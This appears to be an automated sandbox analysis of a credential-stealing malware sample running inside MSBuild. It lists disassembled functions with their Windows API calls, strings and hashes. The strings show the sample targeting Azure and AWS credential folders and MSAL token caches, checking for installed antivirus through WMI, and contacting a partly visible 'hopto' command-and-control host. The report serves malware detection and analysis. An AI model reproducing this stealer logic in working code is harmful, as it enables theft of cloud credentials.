lstrcatA.KERNEL32(?,00000000,?,00000000,?), ref: 00416501
lstrcatA.KERNEL32(?,\.azure\), ref: 0041651E

Part of subcall function 00415FD1: wsprintfA.USER32 ref: 00416018
Part of subcall function 00415FD1: FindFirstFileA.KERNEL32(?,?), ref: 0041602F
Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436AB4), ref: 00416050
Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436AB8), ref: 0041606A
Part of subcall function 00415FD1: wsprintfA.USER32 ref: 00416091
Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436647), ref: 004160A5
Part of subcall function 00415FD1: wsprintfA.USER32 ref: 004160C2
Part of subcall function 00415FD1: PathMatchSpecA.SHLWAPI(?,?), ref: 004160EF
Part of subcall function 00415FD1: lstrcatA.KERNEL32(?), ref: 00416125
Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,00436AD0), ref: 00416137
Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,?), ref: 0041614A
Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,00436AD4), ref: 0041615C
Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,?), ref: 00416170

_memset.LIBCMT ref: 00416556
lstrcatA.KERNEL32(?,00000000), ref: 00416578
lstrcatA.KERNEL32(?,\.aws\), ref: 00416595

Part of subcall function 00415FD1: wsprintfA.USER32 ref: 004160D9
Part of subcall function 00415FD1: CopyFileA.KERNEL32(?,?,00000001), ref: 00416229
Part of subcall function 00415FD1: DeleteFileA.KERNEL32(?), ref: 0041629D
Part of subcall function 00415FD1: FindNextFileA.KERNEL32(?,?), ref: 004162FF
Part of subcall function 00415FD1: FindClose.KERNEL32(?), ref: 00416313

_memset.LIBCMT ref: 004165CA
lstrcatA.KERNEL32(?,00000000), ref: 004165EC
lstrcatA.KERNEL32(?,\.IdentityService\), ref: 00416609
_memset.LIBCMT ref: 0041663E

Strings

Azure\.IdentityService, xrefs: 00416619
\.IdentityService\, xrefs: 004165FD
*.*, xrefs: 00416536
Azure\.aws, xrefs: 004165A5
\.aws\, xrefs: 00416589
*.*, xrefs: 004165AA
Azure\.azure, xrefs: 00416531
msal.cache, xrefs: 0041661E
\.azure\, xrefs: 00416512

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrcat$File_memsetwsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
API String ID: 780282842-974132213
Opcode ID: b2de320116ee48312a564d7ea93f2006b998ac76d702aa901ef76f6d1a7c5bf4
Instruction ID: 84896bacdfb64059cc425482cd21a2e289ba5d14c04e476c3e3a3401a8d995fd
Opcode Fuzzy Hash: b2de320116ee48312a564d7ea93f2006b998ac76d702aa901ef76f6d1a7c5bf4
Instruction Fuzzy Hash: E841C671D4021C7BDB14EB60EC47FDD7378AB09304F6044AAB605A7090EABDAB888F58

Function 0040ABE5 Relevance: 33.3, APIs: 22, Instructions: 315stringmemoryfileCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041718B,004366CD,?,?,?,?,0041869F), ref: 0041050D

Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410650

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004176F9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004171CA,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 004105BD

CopyFileA.KERNEL32(?,?,00000001), ref: 0040AC8A
GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040AD94
RtlAllocateHeap.NTDLL(00000000), ref: 0040AD9B
StrCmpCA.SHLWAPI(?,004373DC,00000000), ref: 0040AE4C
StrCmpCA.SHLWAPI(?,004373E0), ref: 0040AE74
lstrcatA.KERNEL32(00000000,?), ref: 0040AE98
lstrcatA.KERNEL32(00000000,004373E4), ref: 0040AEA4
lstrcatA.KERNEL32(00000000,?), ref: 0040AEAE
lstrcatA.KERNEL32(00000000,004373E8), ref: 0040AEBA
lstrcatA.KERNEL32(00000000,?), ref: 0040AEC4
lstrcatA.KERNEL32(00000000,004373EC), ref: 0040AED0
lstrcatA.KERNEL32(00000000,?), ref: 0040AEDA
lstrcatA.KERNEL32(00000000,004373F0), ref: 0040AEE6
lstrcatA.KERNEL32(00000000,?), ref: 0040AEF0
lstrcatA.KERNEL32(00000000,004373F4), ref: 0040AEFC
lstrcatA.KERNEL32(00000000,?), ref: 0040AF06
lstrcatA.KERNEL32(00000000,004373F8), ref: 0040AF12
lstrcatA.KERNEL32(00000000,?), ref: 0040AF1C
lstrcatA.KERNEL32(00000000,004373FC), ref: 0040AF28
lstrlenA.KERNEL32(00000000), ref: 0040AF7A
lstrlenA.KERNEL32(?), ref: 0040AF95
DeleteFileA.KERNEL32(?), ref: 0040AFD8

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
String ID:
API String ID: 1956182324-0
Opcode ID: 4621e81a25ec7d59100a49f80eb619f1591ab482fb232c2b5530b01b4120e834
Instruction ID: fa65740cd413e8b43b9f1f3498c9fbd0cc5fbb49866f189318ef85710a93ab9e
Opcode Fuzzy Hash: 4621e81a25ec7d59100a49f80eb619f1591ab482fb232c2b5530b01b4120e834
Instruction Fuzzy Hash: D4C15D32904208AFDF15EBA1ED4A9DD7B76EF04309F20102AF501B30A1DB7A6E959F95

Function 00417151 Relevance: 29.0, APIs: 8, Strings: 8, Instructions: 1029networksleepCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041718B,004366CD,?,?,?,?,0041869F), ref: 0041050D

Part of subcall function 00410C53: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004013B9), ref: 00410C5F
Part of subcall function 00410C53: HeapAlloc.KERNEL32(00000000,?,?,?,004013B9), ref: 00410C66
Part of subcall function 00410C53: GetUserNameA.ADVAPI32(00000000,004013B9), ref: 00410C7A

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004171CA,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 004105BD

CloseHandle.KERNEL32(00000000,?,?,?,?,0041869F), ref: 004171ED
OpenEventA.KERNEL32(001F0003,00000000,?,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 004171FC
CreateDirectoryA.KERNEL32(?,00000000,004366DA), ref: 0041771A
InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004177DB
InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004177F4

Part of subcall function 00404B2E: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00404BCD
Part of subcall function 00404B2E: StrCmpCA.SHLWAPI(?), ref: 00404BEB

Part of subcall function 004139C2: StrCmpCA.SHLWAPI(?,block,?,?,00417854), ref: 004139D7
Part of subcall function 004139C2: ExitProcess.KERNEL32 ref: 004139E2

Part of subcall function 00405F39: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00405FD8
Part of subcall function 00405F39: StrCmpCA.SHLWAPI(?), ref: 00405FF6

Part of subcall function 00413198: strtok_s.MSVCRT ref: 004131B7
Part of subcall function 00413198: strtok_s.MSVCRT ref: 0041323A

Sleep.KERNEL32(000003E8), ref: 00417BAA

Part of subcall function 00405F39: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040618E
Part of subcall function 00405F39: HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 004061D2
Part of subcall function 00405F39: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406200

CreateEventA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,0041869F), ref: 00417210

Part of subcall function 0041257F: __EH_prolog3_catch_GS.LIBCMT ref: 00412589
Part of subcall function 0041257F: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,0000013C,00417F41,.exe,00436CCC,00436CC8,00436CC4,00436CC0,00436CBC,00436CB8,00436CB4,00436CB0,00436CAC,00436CA8,00436CA4), ref: 004125A8
Part of subcall function 0041257F: Process32First.KERNEL32(00000000,00000128), ref: 004125B8
Part of subcall function 0041257F: Process32Next.KERNEL32(00000000,00000128), ref: 004125CA
Part of subcall function 0041257F: StrCmpCA.SHLWAPI(?), ref: 004125DC
Part of subcall function 0041257F: CloseHandle.KERNEL32(00000000), ref: 004125F0

CloseHandle.KERNEL32(?), ref: 00418110

Strings

b99f23e6ab2693b305f8810abd671d18, xrefs: 0041781C
cowod., xrefs: 00417F8B
.exe, xrefs: 00417F14
_DEBUG.zip, xrefs: 00418045
hopto, xrefs: 00417FAF
.exe, xrefs: 00417659
http://, xrefs: 00417F67
org, xrefs: 00417FF7

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: InternetOpen$CloseCreateHandlelstrcpy$EventHeapProcessProcess32strtok_s$AllocConnectDirectoryExitFirstH_prolog3_catch_HttpNameNextOptionRequestSleepSnapshotToolhelp32Userlstrcatlstrlen
String ID: .exe$.exe$_DEBUG.zip$b99f23e6ab2693b305f8810abd671d18$cowod.$hopto$http://$org
API String ID: 305159127-3742169049
Opcode ID: ba00fea598c8f9b7eb501b1df4ade5e40b70523d29f0704592d13bea502c8da9
Instruction ID: 4ceb97e4bc8bd76a369d1d2619bbd46815a38cac9c71142bc76181b4c2ec3f3b
Opcode Fuzzy Hash: ba00fea598c8f9b7eb501b1df4ade5e40b70523d29f0704592d13bea502c8da9
Instruction Fuzzy Hash: AC9244315483419FC620FF26D94268EB7E1FF84308F51482FF58463191DBB8AA8D8B9B

Function 004135A8 Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 262stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 004135EA
StrCmpCA.SHLWAPI(?,true), ref: 004136AC

Part of subcall function 00410549: lstrlenA.KERNEL32(?,?,00417284,004366CF,004366CE,?,?,?,?,0041869F), ref: 0041054F
Part of subcall function 00410549: lstrcpyA.KERNEL32(00000000,00000000,?,00417284,004366CF,004366CE,?,?,?,?,0041869F), ref: 00410581

lstrcpyA.KERNEL32(?,?), ref: 0041376E
lstrcpyA.KERNEL32(?,00000000), ref: 0041379F
lstrcpyA.KERNEL32(?,00000000), ref: 004137DB
lstrcpyA.KERNEL32(?,00000000), ref: 00413817
lstrcpyA.KERNEL32(?,00000000), ref: 00413853
lstrcpyA.KERNEL32(?,00000000), ref: 0041388F
lstrcpyA.KERNEL32(?,00000000), ref: 004138CB
strtok_s.MSVCRT ref: 0041398F

Strings

false, xrefs: 004136C5
true, xrefs: 004136A6
zA, xrefs: 004139B4

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrcpy$strtok_s$lstrlen
String ID: false$true$zA
API String ID: 2116072422-752889570
Opcode ID: 66d3b3fef956730522b2c25cb3aeaabc49fb5568f228d64d75f124df70e663f1
Instruction ID: f88d8e482521469d959c87b5d2553cfe3082ffd239838e960e1cb591ae3ba6ed
Opcode Fuzzy Hash: 66d3b3fef956730522b2c25cb3aeaabc49fb5568f228d64d75f124df70e663f1
Instruction Fuzzy Hash: 37B16DB5900218ABCF64EF55DC89ACA77B5BF18305F0001EAE549A7261EB75AFC4CF48

Function 00406963 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 161networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417731), ref: 00410538

Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400,?), ref: 00404AE8
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041718B,004366CD,?,?,?,?,0041869F), ref: 0041050D

InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004069C5
StrCmpCA.SHLWAPI(?), ref: 004069DF
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406A0E
HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00406A4D
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406A7D
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406A88
HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00406AAC
InternetReadFile.WININET(?,?,000007CF,?), ref: 00406B40
InternetCloseHandle.WININET(?), ref: 00406B50
InternetCloseHandle.WININET(?), ref: 00406B5C
InternetCloseHandle.WININET(?), ref: 00406B68

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004171CA,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 004105BD

Strings

GET, xrefs: 00406A42
hhA, xrefs: 00406976
ERROR, xrefs: 00406AB6
ERROR, xrefs: 00406BAB

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$CloseHandleHttp$OpenRequestlstrlen$ConnectCrackFileInfoOptionQueryReadSendlstrcat
String ID: ERROR$ERROR$GET$hhA
API String ID: 3863758870-1019273260
Opcode ID: 5ced189bb939a1fc5faa788c84153e92a49d451aed57d78017f4c722cf7cb7a8
Instruction ID: b8be4e115d185e019c2f990b7d5ff4e2311a6bf9c79d427f1dbcd116f6077eb1
Opcode Fuzzy Hash: 5ced189bb939a1fc5faa788c84153e92a49d451aed57d78017f4c722cf7cb7a8
Instruction Fuzzy Hash: C551ADB1A00269AFDF20EB60DC84AEEB7B9FB04304F0180B6F549B2190DA755EC59F94

Function 00405237 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 161networkmemoryfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417731), ref: 00410538

Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400,?), ref: 00404AE8
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040527E
RtlAllocateHeap.NTDLL(00000000), ref: 00405285
InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 004052A7
StrCmpCA.SHLWAPI(?), ref: 004052C1
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004052F1
HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00405330
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405360
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040536B
HttpQueryInfoA.WININET(?,00000013,?,?,00000000), ref: 00405394
InternetReadFile.WININET(?,?,00000400,?), ref: 004053DA
InternetCloseHandle.WININET(?), ref: 00405439
InternetCloseHandle.WININET(?), ref: 00405445
InternetCloseHandle.WININET(?), ref: 00405451

Strings

GET, xrefs: 00405325
lyA, xrefs: 00405250, 00405457, 0040539E

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHttp$HeapOpenRequest$AllocateConnectCrackFileInfoOptionProcessQueryReadSendlstrcpylstrlen
String ID: GET$lyA
API String ID: 442264750-528342985
Opcode ID: 93394d2a30f133874182854a60609d119d756d54e14361920abb4e7fdad1e848
Instruction ID: 7cffea58bcaab2b22dbdd47c1de4c71017d1c0f04b9407cf92f8036c36bebf65
Opcode Fuzzy Hash: 93394d2a30f133874182854a60609d119d756d54e14361920abb4e7fdad1e848
Instruction Fuzzy Hash: 685119B1900A28AFDF21DF64DC84BEFBBB9EB08346F0050E6E509A2290D6755F858F54

Function 00411997 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 114comCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 0041199E
CoInitializeEx.OLE32(00000000,00000000,00000030,00413F67,?,AV: ,004368C4,Install Date: ,004368B0,00000000,Windows: ,004368A0,Work Dir: In memory,00436888), ref: 004119AD
CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 004119BE
CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 004119D8
CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00411A0E
VariantInit.OLEAUT32(?), ref: 00411A5D

Part of subcall function 00411D42: LocalAlloc.KERNEL32(00000040,00000005,?,?,00411A80,?), ref: 00411D4A
Part of subcall function 00411D42: CharToOemW.USER32(?,00000000), ref: 00411D56

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041718B,004366CD,?,?,?,?,0041869F), ref: 0041050D

VariantClear.OLEAUT32(?), ref: 00411A8B

Strings

Unknown, xrefs: 00411A99
Unknown, xrefs: 00411AA0
Unknown, xrefs: 00411AB4
WQL, xrefs: 00411A28
root\SecurityCenter2, xrefs: 004119F0
Select * From AntiVirusProduct, xrefs: 00411A23
displayName, xrefs: 00411A6F

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: InitializeVariant$AllocBlanketCharClearCreateH_prolog3_catchInitInstanceLocalProxySecuritylstrcpy
String ID: Select * From AntiVirusProduct$Unknown$Unknown$Unknown$WQL$displayName$root\SecurityCenter2
API String ID: 4288110179-315474579
Opcode ID: 4442dc1975a9fab6dcc5a7b23437fd681a9a23585e5f68a612e680f3410bdaea
Instruction ID: a052c58cf411f7e98e6331d271807bd97e667b65bf600afed1fc3e3d3cff73f9
Opcode Fuzzy Hash: 4442dc1975a9fab6dcc5a7b23437fd681a9a23585e5f68a612e680f3410bdaea
Instruction Fuzzy Hash: 90314F70A04245BBCB20DB91DC49EEFBF7CEFC9B10F20465AF611A61A0C6B85941CB68

Function 00401284 Relevance: 24.1, APIs: 16, Instructions: 120stringCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004012A7
_memset.LIBCMT ref: 004012B6
lstrcatA.KERNEL32(?,0043AAA4), ref: 004012D0
lstrcatA.KERNEL32(?,0043AAA8), ref: 004012DE
lstrcatA.KERNEL32(?,0043AAAC), ref: 004012EC
lstrcatA.KERNEL32(?,0043AAB0), ref: 004012FA
lstrcatA.KERNEL32(?,0043AAB4), ref: 00401308
lstrcatA.KERNEL32(?,0043AAB8), ref: 00401316
lstrcatA.KERNEL32(?,0043AABC), ref: 00401324
lstrcatA.KERNEL32(?,0043AAC0), ref: 00401332
lstrcatA.KERNEL32(?,0043AAC4), ref: 00401340
lstrcatA.KERNEL32(?,0043AAC8), ref: 0040134E
lstrcatA.KERNEL32(?,0043AACC), ref: 0040135C
lstrcatA.KERNEL32(?,0043AAD0), ref: 0040136A
lstrcatA.KERNEL32(?,0043AAD4), ref: 00401378

Part of subcall function 00410C85: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00401385), ref: 00410C91
Part of subcall function 00410C85: RtlAllocateHeap.NTDLL(00000000,?,?,?,00401385), ref: 00410C98
